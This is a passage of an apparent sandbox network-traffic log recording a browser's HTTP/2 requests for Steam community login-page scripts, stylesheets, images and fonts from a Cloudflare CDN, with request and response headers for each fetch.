expires: Sun, 28 Apr 2024 22:27:43 GMT
etag: "3Pb1f2YLp788"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 195731
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe49c8246709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=gYtbaAKt6bwQ&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/login.js?v=gYtbaAKt6bwQ&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/png
content-length: 10863
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-2a6f"
x-cache: MISS
cf-cache-status: HIT
age: 4701
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d26709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/svg+xml
last-modified: Tue, 17 Nov 2020 23:34:54 GMT
etag: W/"5fb45e1e-e64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 66
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d36709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/logo_valve_footer.png HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/png
content-length: 1846
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-736"
x-cache: MISS
cf-cache-status: HIT
age: 4551
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d06709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/header_menu_hamburger.png HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 150217
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:27:42 GMT
etag: "8BlFIKwdZV37"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 195731
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d86709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/responsive/header_logo.png HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/png
content-length: 3777
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-ec1"
x-cache: MISS
cf-cache-status: HIT
age: 1823
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d16709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/header/logo_steam.svg?t=962016 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 10860
cache-control: public,max-age=15552000
expires: Sat, 25 Nov 2023 06:04:33 GMT
etag: "gYtbaAKt6bwQ"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 2697820
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78cc6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=eYJYuhv32ILn&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/community/main.css?v=eYJYuhv32ILn&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 205391
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:27:43 GMT
etag: "tSnvragsq7Tn"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 195731
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d66709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=F9Ougyu-CyG3&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/manifest.js?v=F9Ougyu-CyG3&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 6584
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:27:42 GMT
etag: "F9Ougyu-CyG3"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 195731
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d56709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=tSnvragsq7Tn&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/libraries~b28b7af69.js?v=tSnvragsq7Tn&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/javascript;charset=UTF-8
content-length: 6238
cache-control: public,max-age=15552000
expires: Sat, 04 Nov 2023 23:02:58 GMT
etag: "pSvIAKtunfWg"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 253325
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78cf6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=8BlFIKwdZV37&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/main.js?v=8BlFIKwdZV37&l=english&_cdn=cloudflare HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/png
content-length: 3737
last-modified: Fri, 05 Jan 2018 01:34:51 GMT
etag: "5a4ed63b-e99"
x-cache: MISS
cf-cache-status: HIT
age: 3804
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d96709-AMS
GET

https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/images/skin_1/footerLogo_valve.png?v=1 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: text/css;charset=UTF-8
content-length: 29267
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:27:51 GMT
etag: "eYJYuhv32ILn"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
x-cache: MISS
cf-cache-status: HIT
age: 195722
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a78d46709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Regular.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 118736
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-1cfd0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5335
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef3e6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Light.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 122684
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-1df3c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4982
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef3b6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Thin.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 122660
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-1df24"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 6329
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef3d6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Medium.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 124048
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-1e490"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5960
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef466709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Bold.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 135500
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-2114c"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4415
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef496709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 133600
last-modified: Tue, 28 Jul 2020 23:16:28 GMT
etag: "5f20b1cc-209e0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 6629
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef4b6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 134500
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-20d64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 2235
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef4c6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 123884
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-1e3ec"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4181
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef486709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Black.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/fonts/MotivaSans-Black.ttf?v=4.015 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://steamcommunity.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:10 GMT
content-type: application/octet-stream
content-length: 120816
last-modified: Tue, 28 Jul 2020 23:16:27 GMT
etag: "5f20b1cb-1d7f0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 725
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feb0ef4e6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/shared_english-json.js?contenthash=7b917bcf42abcf2ea66b

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/localization/shared_english-json.js?contenthash=7b917bcf42abcf2ea66b HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 24 Oct 2023 22:53:30 GMT
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:54:46 GMT
x-cache: MISS
cf-cache-status: HIT
age: 798933
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feed2b5c6709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/sales_english-json.js?contenthash=66fa680c5f641af586b2

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/localization/sales_english-json.js?contenthash=66fa680c5f641af586b2 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:10 GMT
cache-control: public,max-age=15552000
expires: Mon, 29 Apr 2024 04:05:58 GMT
x-cache: MISS
cf-cache-status: HIT
age: 99306
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feed6b8b6709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/localization/main_english-json.js?contenthash=1677c4549d6264782145

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/localization/main_english-json.js?contenthash=1677c4549d6264782145 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 24 Oct 2023 22:53:30 GMT
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:54:46 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 174178
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feedabb26709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/shared/images/login/code_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/login/code_box.png?v=1 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: image/png
content-length: 3196
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-c7c"
x-cache: MISS
cf-cache-status: HIT
age: 3086
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feee0c0c6709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/login/friendlyname_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/login/friendlyname_box.png?v=1 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: image/png
content-length: 3297
last-modified: Fri, 05 Jan 2018 01:35:16 GMT
etag: "5a4ed654-ce1"
x-cache: MISS
cf-cache-status: HIT
age: 2408
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feee0c046709-AMS
GET

https://community.cloudflare.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/shared/images/joinsteam/new_login_bg_strong_mask.jpg HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: image/jpeg
content-length: 124529
cf-bgj: h2pri
etag: "63056bdf-1e671"
last-modified: Wed, 24 Aug 2022 00:07:59 GMT
x-cache: MISS
cf-cache-status: HIT
age: 4719
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feee2c216709-AMS
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~f036ce556.js?contenthash=5db8d117336870d619b6

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/libraries~f036ce556.js?contenthash=5db8d117336870d619b6 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:36:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:37:59 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 185127
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff09ab626709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/chunk~0012678b1.js?contenthash=84f282c00660307da92a

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/chunk~0012678b1.js?contenthash=84f282c00660307da92a HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 31 Oct 2023 22:26:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:27:43 GMT
x-cache: HIT
cf-cache-status: HIT
age: 195760
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff09ab616709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/css/applications/community/chunk~f036ce556.css?contenthash=bad700c313ffaf7c2d59

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/community/chunk~f036ce556.css?contenthash=bad700c313ffaf7c2d59 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
